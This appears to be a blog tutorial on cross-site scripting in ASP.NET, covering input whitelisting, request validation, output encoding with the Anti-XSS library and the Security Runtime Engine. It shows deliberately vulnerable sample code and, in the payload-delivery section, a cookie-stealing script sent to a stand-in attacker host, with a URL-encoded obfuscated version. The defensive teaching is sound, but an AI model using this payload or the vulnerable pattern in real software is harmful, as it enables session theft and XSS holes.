In the first post of this series I talked about injection and, of most relevance for .NET developers, SQL injection. This exploit has some pretty severe consequences but fortunately many of the common practices employed when building .NET apps today – namely accessing data via stored procedures and ORMs – mean most apps have a head start on fending off attackers.



Cross-site scripting is where things begin to get really interesting, starting with the fact that it’s by far and away the most commonly exploited vulnerability out there today. Last year, WhiteHat Security delivered their Website Security Statistics Report and found a staggering 65% of websites with XSS vulnerabilities; that’s four times as many as the SQL injection vulnerability we just looked at.

But is XSS really that threatening? Isn’t it just a tricky way to put alert boxes into random websites by sending someone a carefully crafted link? No, it’s much, much more than that. It’s a serious vulnerability that can have very broad ramifications.

Defining XSS

Let’s go back to the OWASP definition:

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

So as with the injection vulnerability, we’re back to untrusted data and validation again. The main difference this time around is that there’s a dependency on leveraging the victim’s browser for the attack. Here’s how it manifests itself and what the downstream impact is:

| Threat Agents | Attack Vectors | Security Weakness | Technical Impacts | Business Impact |
|---|---|---|---|---|
| | Exploitability: AVERAGE | Prevalence: VERY WIDESPREAD. Detectability: EASY | Impact: MODERATE | |
| Consider anyone who can send untrusted data to the system, including external users, internal users, and administrators. | Attacker sends text-based attack scripts that exploit the interpreter in the browser. Almost any source of data can be an attack vector, including internal sources such as data from the database. | XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content. There are three known types of XSS flaws: 1) Stored, 2) Reflected, and 3) DOM based XSS. Detection of most XSS flaws is fairly easy via testing or code analysis. | Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc. | Consider the business value of the affected system and all the data it processes. Also consider the business impact of public exposure of the vulnerability. |

As with the previous description about injection, the attack vectors are numerous but XSS also has the potential to expose an attack vector from a database, that is, data already stored within the application. This adds a new dynamic to things because it means the exploit can be executed well after a system has already been compromised.

Anatomy of an XSS attack

One of the best descriptions I’ve heard of XSS was from Jeff Williams in the OWASP podcast number 67 on XSS where he described it as “breaking out of a data context and entering a code context”. So think of it as a vulnerable system expecting a particular field to be passive data when in fact it carries a functional payload which actively causes an event to occur. The event is normally a request for the browser to perform an activity outside the intended scope of the web application. In the context of security, this will often be an event with malicious intent.



Here’s the use case we’re going to work with: Our sample website from part 1 has some links to external sites. The legal folks want to ensure there is no ambiguity as to where this website ends and a new one begins, so any external links need to present the user with a disclaimer before they exit.

In order to make it easily reusable, we’re passing the URL via query string to a page with the exit warning. The page displays a brief message then allows the user to continue on to the external website. As I mentioned in part 1, these examples are going to be deliberately simple for the purpose of illustration. I’m also going to turn off ASP.NET request validation and I’ll come back around to why a little later on. Here’s how the page looks:

You can see the status bar telling us the link is going to take us off to http://www.asp.net/ which is the value of the “Url” parameter in the location bar. Code wise it’s pretty simple with the ASPX using a literal control:

<p>You are now leaving this site - we're no longer responsible!</p> <p><asp:Literal runat="server" ID="litLeavingTag" /></p>

And the code behind simply constructing an HTML hyperlink:

var newUrl = Request.QueryString["Url"]; var tagString = "<a href=" + newUrl + ">continue</a>"; litLeavingTag.Text = tagString;

So we end up with HTML syntax like this:

<p><a href=http://www.asp.net>continue</a></p>

This works beautifully plus it’s simple to build, easy to reuse and seemingly innocuous in its ability to do any damage. Of course we should have used a native hyperlink control but this approach makes it a little easier to illustrate XSS.





So what happens if we start manipulating the data in the query string and including code? I’m going to just leave the query string name and value in the location bar for the sake of succinctness, look at what happens to the “continue” link now:

It helps when you see the parameter represented in context within the HTML:

<p><a href=http://www.asp.net>xss>continue</a></p>

So what’s happened is that we’ve managed to close off the opening <a> tag and add the text “xss” by ending the hyperlink tag context and entering an all new context. This is referred to as “injecting up”.
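To see the break-out without a browser, here is a minimal console sketch that repeats the same string concatenation as the code behind. The class and method names are made up for illustration; only the concatenation itself comes from the page above.

```csharp
using System;

public static class LeavingSiteDemo
{
    // Mirrors the code behind: the query string value is concatenated
    // straight into the tag with no validation and no encoding.
    public static string BuildTag(string newUrl)
    {
        return "<a href=" + newUrl + ">continue</a>";
    }

    public static void Main()
    {
        // Expected input stays inside the href attribute.
        Console.WriteLine(BuildTag("http://www.asp.net"));
        // prints: <a href=http://www.asp.net>continue</a>

        // The ">" in the value closes the opening tag early, so "xss"
        // lands in the page as content rather than as part of the URL.
        Console.WriteLine(BuildTag("http://www.asp.net>xss"));
        // prints: <a href=http://www.asp.net>xss>continue</a>
    }
}
```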

The code then attempts to close the tag again which is why we get the greater than symbol. Although this doesn’t appear particularly threatening, what we’ve just done is manipulated the markup structure of the page. This is a problem, here’s why:



Whoa! What just happened? We’ve lost the entire header of the website! By inspecting the HTML source code of the page I was able to identify that a CSS style called “header” is applied to the entire top section of the website. Because my query string value is being written verbatim to the source code I was able to pass in a redefined header which simply turned it off.

But this is ultimately just a visual tweak, let’s probe a little further and attempt to actually execute some code in the browser:

Let’s pause here because this is where the penny usually drops. What we are now doing is actually executing arbitrary code – JavaScript in this case – inside the victim’s browser and well outside the intended scope of the application simply by carefully constructing the URL. But of course from the end user’s perspective, they are browsing a legitimate website on a domain they recognise and it’s throwing up a JavaScript message box.



Message boxes are all well and good but let’s push things into the realm of a truly maliciously formed XSS attack which actually has the potential to do some damage:

Inspecting the HTML source code disclosed the ID of the log in link and it only takes a little bit of JavaScript to reference the object and change the target location of the link. What we’ve got now is a website which, if accessed by the carefully formed URL, will cause the log in link to take the user to an arbitrary website. That website may then recreate the branding of the original (so as to keep up the charade) and include username and password boxes which then save the credentials to that site.

Bingo. User credentials now stolen.

What made this possible?

As with the SQL injection example in the previous post, this exploit has only occurred due to a couple of entirely independent failures in the application design. Firstly, there was no expectation set as to what an acceptable parameter value was. We were able to manipulate the query string to our heart’s desire and the app would just happily accept the values.

Secondly, the application took the parameter value and rendered it into the HTML source code precisely. It trusted that whatever the value contained was suitable for writing directly into the href attribute of the tag.

Validate all input against a whitelist

I pushed this heavily in the previous post and I’m going to do it again now:

All input must be validated against a whitelist of acceptable value ranges.

URLs are an easy one to validate against a whitelist using a regular expression because there is a specification written for this: RFC 3986. The specification defines 18 reserved characters which can perform a special function, plus the percent sign which introduces a percent-encoded value:

| ! | * | ' | ( | ) | ; | : | @ | & | = | + | $ | , | / | ? | % | # | [ | ] |

And 66 unreserved characters:

| A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z |

| a | b | c | d | e | f | g | h | i | j | k | l | m | n | o | p | q | r | s | t | u | v | w | x | y | z |

| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | - | _ | . | ~ |

Obviously the exploits we exercised earlier use characters both outside those allowable by the specification, such as “<”, and use reserved characters outside their intended context, such as “/”. Of course reserved characters are allowed if they’re appropriately encoded but we’ll come back to encoding a little later on.

There are a couple of different ways we could tackle this. Usually we’d write a regex (actually, usually I’d copy one from somewhere!) and there are plenty of URL regexes out there to use as a starting point.

However, things are a little easier in .NET because we have the Uri.IsWellFormedUriString method. We’ll use this method to validate the address as absolute (this context doesn’t require relative addresses), and if it doesn’t meet RFC 3986 or the internationalised version, RFC 3987, we’ll know it’s not valid.

var newUrl = Request.QueryString["Url"]; if (!Uri.IsWellFormedUriString(newUrl, UriKind.Absolute)) { litLeavingTag.Text = "An invalid URL has been specified."; return; }

This example was made easier because of the native framework validation for the URL. Of course there are many examples where you do need to get your hands a little dirtier and actually write a regex against an expected pattern. It may be to validate an integer, a GUID (although of course we now have a native Guid.TryParse in .NET 4) or a string value that needs to be within an accepted range of characters and length. The stricter the whitelist is without returning false positives, the better.
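As a rough sketch of what stricter whitelists might look like, the helper below narrows the URL check to http and https, since a well-formed absolute URI can still use other schemes such as ftp or mailto, and adds strict checks for an integer, a GUID and a short name. All class and method names are hypothetical, and the name pattern in particular is an assumption; a real one depends on what your application legitimately needs to accept.

```csharp
using System;
using System.Globalization;
using System.Text.RegularExpressions;

public static class InputWhitelist
{
    // Assumed rule for illustration: 1 to 50 characters, starting with a letter,
    // then letters, spaces, hyphens or apostrophes. \A and \z anchor the match
    // to the whole string so nothing can trail after it.
    private static readonly Regex NamePattern =
        new Regex(@"\A[A-Za-z][A-Za-z '\-]{0,49}\z");

    // Well-formed, absolute, and limited to the http/https schemes.
    public static bool IsAllowedExternalUrl(string candidate)
    {
        Uri uri;
        if (string.IsNullOrEmpty(candidate)) return false;
        if (!Uri.IsWellFormedUriString(candidate, UriKind.Absolute)) return false;
        if (!Uri.TryCreate(candidate, UriKind.Absolute, out uri)) return false;
        return uri.Scheme == Uri.UriSchemeHttp || uri.Scheme == Uri.UriSchemeHttps;
    }

    // Digits only (no sign, whitespace or separators) and greater than zero.
    public static bool IsValidId(string candidate)
    {
        int id;
        return int.TryParse(candidate, NumberStyles.None,
                            CultureInfo.InvariantCulture, out id) && id > 0;
    }

    // Guid.TryParse is available from .NET 4.
    public static bool IsValidGuid(string candidate)
    {
        Guid parsed;
        return Guid.TryParse(candidate, out parsed);
    }

    public static bool IsValidName(string candidate)
    {
        return candidate != null && NamePattern.IsMatch(candidate);
    }

    public static void Main()
    {
        Console.WriteLine(IsAllowedExternalUrl("http://www.asp.net/")); // True
        Console.WriteLine(IsAllowedExternalUrl("ftp://www.asp.net/"));  // False
        Console.WriteLine(IsValidId("42"));                             // True
        Console.WriteLine(IsValidName("Troy <i>Hunt</i>"));             // False
    }
}
```

The order of the checks matters little here; the point is that every rule describes what is allowed, and anything else is rejected by default.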

The other thing I’ll touch on again briefly in this post is that the “validate all input” mantra really does mean all input. We’ve been using query strings but the same rationale applies to form data, cookies, HTTP headers etc, etc. If it’s untrusted and potentially malicious, it gets validated before doing anything with it.



Always use request validation – just not exclusively

Earlier on I mentioned I’d turned .NET request validation off. Let’s take the “picture speaks a thousand words” approach and just turn it back on to see what happens:

Request validation is the .NET framework’s native defence against XSS. Unless explicitly turned off, all ASP.NET web apps will look for potentially malicious input and throw the error above along with an HTTP 500 if detected. So without writing a single line of code, the XSS exploits we attempted earlier on would never occur.

However, there are times when request validation is too invasive. It’s an effective but primitive control which operates by looking for some pretty simple character patterns. But what if one of those character patterns is actually intended user input?

A good use case here is rich HTML editors. Often these are posting markup to the server (some of them will actually allow you to edit the markup directly in the browser) and with request validation left on the post will never process. Fortunately though, we can turn off the validation within the page directive of the ASPX:

<%@ Page Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="LeavingSite.aspx.cs" Inherits="Web.LeavingSite" Title="Leaving Site" ValidateRequest="false" %>

Alternatively, request validation can be turned off across the entire site within the web.config:

<pages validateRequest="false" />

Frankly, this is simply not a smart idea unless there is a really good reason why you’d want to remove this safety net from every single page in the site. I wrote about this a couple of months back in Request Validation, DotNetNuke and design utopia and likened it to turning off the electronic driver aids in a high performance car. Sure, you can do it, but you’d better be damn sure you know what you’re doing first.

Just a quick note on ASP.NET 4; the goalposts have moved a little. The latest framework version now moves the validation up the pipeline to before the BeginRequest event in the HTTP request. The good news is that the validation now also applies to HTTP requests for resources other than just ASPX pages, such as web services. The bad news is that because the validation is happening before the page directive is parsed, you can no longer turn it off at the page level whilst running in .NET 4 request validation mode. To be able to disable validation we need to ask the web.config to regress back to 2.0 validation mode:

<httpRuntime requestValidationMode="2.0" />

The last thing I’ll say on request validation is to try and imagine it’s not there. It’s not an excuse not to explicitly validate your input; it’s just a safety net for if you miss a fundamental piece of manual validation. The DotNetNuke example above is a perfect illustration of this; it ran for quite some time with a fairly serious XSS flaw in the search page but it was only exploitable because they'd turned off request validation site wide.

Don’t turn off .NET request validation anywhere unless you absolutely have to and even then, only do it on the required pages.

HTML output encoding

Another essential defence against XSS is proper use of output encoding. The idea of output encoding is to ensure each character in a string is rendered so that it appears correctly in the output media. For example, in order to render the text <i> in the browser we need to encode it into &lt;i&gt;, otherwise it will take on functional meaning and not render to the screen.







It’s a little difficult to use the previous example because we actually wanted that string rendered as provided in the HTML source as it was a tag attribute (the Anti-XSS library I’ll touch on shortly has a suitable output encoding method for this scenario). Let’s take another simple case, one that regularly demonstrates XSS flaws:

This is a pretty common scene; enter your name and email and you’ll get a friendly, personalised response when you’re done. The problem is, oftentimes that string in the thank you message is just the input data directly rewritten to the screen:

var name = txtName.Text; var message = "Thank you " + name; lblSignupComplete.Text = message;



This means we run the risk of breaking out of the data context and entering the code context, just like this:

Given the output context is a web page, we can easily encode for HTML:

var name = Server.HtmlEncode(txtName.Text); var message = "Thank you " + name; lblSignupComplete.Text = message;

Which will give us a totally different HTML syntax with the tags properly escaped:

Thank you Troy &lt;i&gt;Hunt&lt;/i&gt;

And consequently we see the name being represented in the browser precisely as it was entered into the field:

So the real XSS defence here is that any text entered into the name field will now be rendered precisely in the UI, not precisely in the code. If we tried any of the strings from the earlier exploits, they’d fail to offer any leverage to the attacker.
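The same behaviour can be checked outside a page with a small console sketch. It assumes System.Net.WebUtility.HtmlEncode (available from .NET 4) as a stand-in for Server.HtmlEncode so that it runs without a web context; the class and method names are illustrative only.

```csharp
using System;
using System.Net;

public static class HtmlEncodingDemo
{
    // Encode the untrusted value at the point it is written into HTML.
    public static string BuildThankYou(string name)
    {
        return "Thank you " + WebUtility.HtmlEncode(name);
    }

    public static void Main()
    {
        Console.WriteLine(BuildThankYou("Troy <i>Hunt</i>"));
        // prints: Thank you Troy &lt;i&gt;Hunt&lt;/i&gt;
    }
}
```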

Output encoding should be performed on all untrusted data but it’s particularly important on free text fields where any whitelist validation has to be fairly generous. There are valid use cases for allowing angle brackets and although a thorough regex should exclude attempts to manufacture HTML tags, the output encoding remains invaluable insurance at a very low cost.

One thing you need to keep in mind with output encoding is that it should be applied to untrusted data at any stage in its lifecycle, not just at the point of user input. The example above would quite likely store the two fields in a database and redisplay them at a later date. The data might be exposed again through an administration layer to monitor subscriptions or the name could be included in email notifications. This is persisted or stored XSS as the attack is actually stored on the server so every single time this data is resurfaced, it needs to be encoded again.

Non-HTML output encoding



There’s a bit of a sting in the encoding tail; not all output should be encoded to HTML. JavaScript is an excellent case in point. Let’s imagine that instead of writing the thank you message to the page in HTML, we wanted to return the response in a JavaScript alert box:

var name = Server.HtmlEncode(txtName.Text); var message = "Thank you " + name; var alertScript = "<script>alert('" + message + "');</script>"; ClientScript.RegisterClientScriptBlock(GetType(), "ThankYou", alertScript);

Let’s try this with the italics example from earlier on:

Obviously this isn’t what we want to see as encoded HTML simply doesn’t play nice with JavaScript – they both have totally different encoding syntaxes. Of course it could also get a lot worse; the characters that could be leveraged to exploit JavaScript are not necessarily going to be caught by HTML encoding at all and if they are, they may well be encoded into values not suitable in the JavaScript context. This brings us to the Anti-XSS library.



Anti-XSS

JavaScript output encoding is a great use case for the Microsoft Anti-Cross Site Scripting Library also known as Anti-XSS. This is a CodePlex project with encoding algorithms for HTML, XML, CSS and of course, JavaScript.

A fundamental difference between the encoding performed by Anti-XSS and that done by the native HtmlEncode method is that the former works against a whitelist whilst the latter works against a blacklist. In the last post I talked about the differences between the two and why the whitelist approach is the more secure route. Consequently, the Anti-XSS library is a preferable choice even for HTML encoding.



Moving onto JavaScript, let’s use the library to apply proper JavaScript encoding to the previous example:

var name = AntiXss.JavaScriptEncode(txtName.Text, false); var message = "Thank you " + name; var alertScript = "<script>alert('" + message + "');</script>"; ClientScript.RegisterClientScriptBlock(GetType(), "ThankYou", alertScript);

We’ll now find a very different piece of syntax to when we were encoding for HTML:

<script>alert('Thank you Troy \x3ci\x3eHunt\x3c\x2fi\x3e');</script>

And we’ll actually get a JavaScript alert containing the precise string entered into the textbox:

Using an encoding library like Anti-XSS is absolutely essential. The last thing you want to be doing is manually working through all the possible characters and escape combinations to try and write your own output encoder. It’s hard work, it quite likely won’t be comprehensive enough and it’s totally unnecessary.
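For comparison only, the framework itself has HttpUtility.JavaScriptStringEncode from .NET 4 onwards. The sketch below swaps it in for AntiXss.JavaScriptEncode so that it compiles without the library installed. It is not the Anti-XSS call used above, its escape format may differ from the \x3c style shown earlier, and the class and method names are hypothetical.

```csharp
using System;
using System.Web;

public static class JavaScriptEncodingDemo
{
    // Encode for the JavaScript string context, not the HTML context,
    // because the value ends up inside a quoted JavaScript literal.
    public static string BuildAlertScript(string name)
    {
        string encodedName = HttpUtility.JavaScriptStringEncode(name);
        return "<script>alert('Thank you " + encodedName + "');</script>";
    }

    public static void Main()
    {
        // The angle brackets and quotes in the input are escaped, so the
        // value stays inside the string literal passed to alert().
        Console.WriteLine(BuildAlertScript("Troy <i>Hunt</i>"));
        Console.WriteLine(BuildAlertScript("x');alert(1);//"));
    }
}
```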

One last comment on Anti-XSS functionality; as well as output encoding, the library also has functionality to render “safe” HTML by removing malicious scripts. If, for example, you have an application which legitimately stores markup in the data layer (could be from a rich text editor), and it is to be redisplayed to the page, the GetSafeHtml and GetSafeHtmlFragment methods will sanitise the data and remove scripts. Using this method rather than HtmlEncode means hyperlinks, text formatting and other safe markup will functionally render (the behaviours will work) whilst the nasty stuff is stripped.



SRE

Another excellent component of the Anti-XSS product is the Security Runtime Engine or SRE. This is essentially an HTTP module that hooks into the pre-render event in the page lifecycle and encodes server controls before they appear on the page. You have quite granular control over which controls and attributes are encoded and it’s a very easy retrofit to an existing app.

Firstly, we need to add the AntiXssModule reference alongside our existing AntiXssLibrary reference. Next up we’ll add the HTTP module to the web.config:

<httpModules> <add name="AntiXssModule" type="Microsoft.Security.Application.SecurityRuntimeEngine.AntiXssModule"/> </httpModules>



The final step is to create an antixssmodule.config file which maps out the controls and attributes to be automatically encoded. The Anti-XSS installer gives you the Configuration Generator for SRE which helps automate the process. Just point it at the generated website assembly and it will identify all the pages and controls which need to be mapped out:

The generate button will then allow you to specify a location for the config file which should be the root of the website. Include it in the project and take a look:

<Configuration> <ControlEncodingContexts> <ControlEncodingContext FullClassName="System.Web.UI.WebControls.Label" PropertyName="Text" EncodingContext="Html" /> </ControlEncodingContexts> <DoubleEncodingFilter Enabled="True" /> <EncodeDerivedControls Enabled="True" /> <MarkAntiXssOutput Enabled="False" Color="Yellow" /> </Configuration>

I’ve removed a whole lot of content for the purpose of demonstration. I’ve left in the encoding for the text attribute of the label control and removed the 55 other entries that were created based on the controls presently being used in the website.

If we now go right back to the first output encoding demo we can run the originally vulnerable code which didn’t have any explicit output encoding:

var name = txtName.Text; var message = "Thank you " + name; lblSignupComplete.Text = message;

And hey presto, we’ll get the correctly encoded output result:

This is great because just as with request validation, it’s an implicit defence which looks after you when all else fails. However, just like request validation you should take the view that this is only a safety net and doesn’t absolve you of the responsibility to explicitly output encode your responses.

SRE is smart enough not to double-encode so you can happily run explicit and implicit encoding alongside each other. It will also do other neat things like apply encoding on control attributes derived from the ones you’ve already specified and allow encoding suppression on specific pages or controls. Finally, it’s a very easy retrofit to existing apps as it’s a no-code solution. This is a pretty compelling argument for people trying to patch XSS holes without investing in a lot of re-coding.

Threat model your input

One way we can pragmatically assess the risks and required actions for user input is to perform some basic threat modelling on the data. Microsoft provides some good tools and guidance for application threat modelling but for now we’ll just work with a very simple matrix.

In this instance we’re going to do some very basic modelling simply to understand a little bit more about the circumstances in which the data is captured, how it’s handled afterwards and what sort of encoding might be required. Although this is a pretty basic threat model, it forces you to stop and think about your data more carefully. Here’s how the model looks for the two examples we’ve done already:

| Use case scenario | Scenario inputs | Input trusted | Scenario outputs | Output contains untrusted input | Requires encoding | Encoding method |
|---|---|---|---|---|---|---|
| User follows external link | URL | No | URL written to href attribute of <a> tag | Yes | Yes | HtmlAttributeEncode |
| User signs up | Name | No | Name written to HTML | Yes | Yes | HtmlEncode |
| User signs up | Email | No | N/A | N/A | N/A | N/A |

This is a great little model to apply to new app development but it’s also an interesting one to run over existing ones. Try mapping out the flow of your data in the format and see if it makes it back out to a UI without proper encoding. If the XSS stats are to be believed, you’ll probably be surprised by the outcome.
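One way to read the “Encoding method” column is as a lookup from output context to encoder. A minimal sketch of that idea follows. The enum and class are hypothetical, and the framework encoders (WebUtility.HtmlEncode, HttpUtility.HtmlAttributeEncode, Uri.EscapeDataString) are assumed here as stand-ins for whichever encoding library you settle on.

```csharp
using System;
using System.Net;
using System.Web;

// Hypothetical set of output contexts, one per row type in the matrix.
public enum OutputContext { Html, HtmlAttribute, UrlParameter }

public static class ContextEncoder
{
    // Pick the encoder from where the value is going, not where it came from.
    public static string Encode(string untrusted, OutputContext context)
    {
        switch (context)
        {
            case OutputContext.Html:
                return WebUtility.HtmlEncode(untrusted);
            case OutputContext.HtmlAttribute:
                return HttpUtility.HtmlAttributeEncode(untrusted);
            case OutputContext.UrlParameter:
                return Uri.EscapeDataString(untrusted);
            default:
                throw new ArgumentOutOfRangeException("context");
        }
    }

    public static void Main()
    {
        Console.WriteLine(Encode("<i>", OutputContext.Html));           // &lt;i&gt;
        Console.WriteLine(Encode("a b&c", OutputContext.UrlParameter)); // a%20b%26c

        // Attribute encoding only helps when the attribute value is quoted.
        string href = Encode("http://www.asp.net/", OutputContext.HtmlAttribute);
        Console.WriteLine("<a href=\"" + href + "\">continue</a>");
    }
}
```

Note the quoted href in the last line: attribute encoding is designed for quoted attribute values, so the unquoted form used in the earlier exit page would still need fixing.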

Delivering the XSS payload

The examples above are great illustrations, but they’re non-persistent in that the app relied on us entering malicious strings into input boxes and URL parameters. So how is an XSS payload delivered to an unsuspecting victim?

The easiest way to deliver the XSS payload – that is the malicious intent component – is by having the victim follow a loaded URL. Usually the domain will appear legitimate and the exploit is contained within parameters of the address. The payload may be apparent to those who know what to look for but it could also be far more covert. Often URL encoding will be used to obfuscate the content. For example, the before state:

username=<script>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script>

And the encoded state:

username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73%63%72%69%70%74%3E
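Obfuscation like this is only skin deep, because the value is decoded again before the application works with it. A quick sketch using Uri.UnescapeDataString on the opening and closing fragments of the encoded string shows the tags reappearing (the class name is illustrative):

```csharp
using System;

public static class PayloadDecodingDemo
{
    // Percent-decoding turns the obfuscated form back into the raw payload.
    public static string Decode(string encoded)
    {
        return Uri.UnescapeDataString(encoded);
    }

    public static void Main()
    {
        Console.WriteLine(Decode("%3C%73%63%72%69%70%74%3E"));    // <script>
        Console.WriteLine(Decode("%3C%2F%73%63%72%69%70%74%3E")); // </script>
    }
}
```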

Another factor allowing a lot of potential for XSS to slip through is URL shorteners. The actual address behind http://bit.ly/culCJi is usually not disclosed until actually loaded into the browser. Obviously this activity alone can deliver the payload and the victim is none the wiser until it’s already loaded (if they even realise then).

This section wouldn’t be complete without at least mentioning social engineering. Constructing malicious URLs to exploit vulnerable sites is one thing, tricking someone into following them is quite another. However the avenues available to do this are almost limitless; spam mail, phishing attempts, social media, malware and so on and so on. Suffice to say the URL needs to be distributed and there are ample channels available to do this.

The reality is the payload can be delivered through following a link from just about anywhere. But of course the payload is only of value when the application is vulnerable. Loaded URLs manipulated with XSS attacks are worthless without a vulnerable target.



IE8 XSS filter

So far we’ve focussed purely on how we can implement countermeasures against XSS on the server side. Rightly so too, because that’s the only environment we really have direct control over.

However, it’s worth a very brief mention that steps are also being taken on the client side to harden browsers against this pervasive vulnerability. As of Internet Explorer 8, the internet’s most popular browser brand now has an XSS Filter which attempts to block attacks and report them to the user:

This particular implementation is not without its issues though. There are numerous examples of where the filter doesn’t quite live up to expectations and can even open new vulnerabilities which didn’t exist in the first place.

However, the action taken by browser manufacturers is really incidental to the action required by web application developers. Even if IE8 implemented a perfect XSS filter model we’d still be looking at many years before older, more vulnerable browsers are broadly superseded. Given more than 20% of people are still running IE6 at the time of writing, now almost a 9 year old browser, we’re in for a long wait before XSS is secured in the client.

Summary

We have a bit of a head start with ASP.NET because it’s just so easy to put up defences against XSS either using the native framework defences or with freely available options from Microsoft. Request validation, Anti-XSS and SRE are all excellent and should form a part of any security conscious .NET web app.

Having said that, none of these absolve the developer from proactively writing secure code. Input validation, for example, is still absolutely essential and it’s going to take a bit of effort to get right in some circumstances, particularly in writing regular expression whitelists.

However, if you’re smart about it and combine the native defences of the framework with securely coded application logic and apply the other freely available tools discussed above, you’ll have a very high probability of creating an application secure from XSS.

Resources

- XSS Cheat Sheet

- Microsoft Anti-Cross Site Scripting Library V1.5: Protecting the Contoso Bookmark Page

- Anti-XSS Library v3.1: Find, Fix, and Verify Errors (Channel 9 video)

- A Sneak Peak at the Security Runtime Engine

- XSS (Cross Site Scripting) Prevention Cheat Sheet
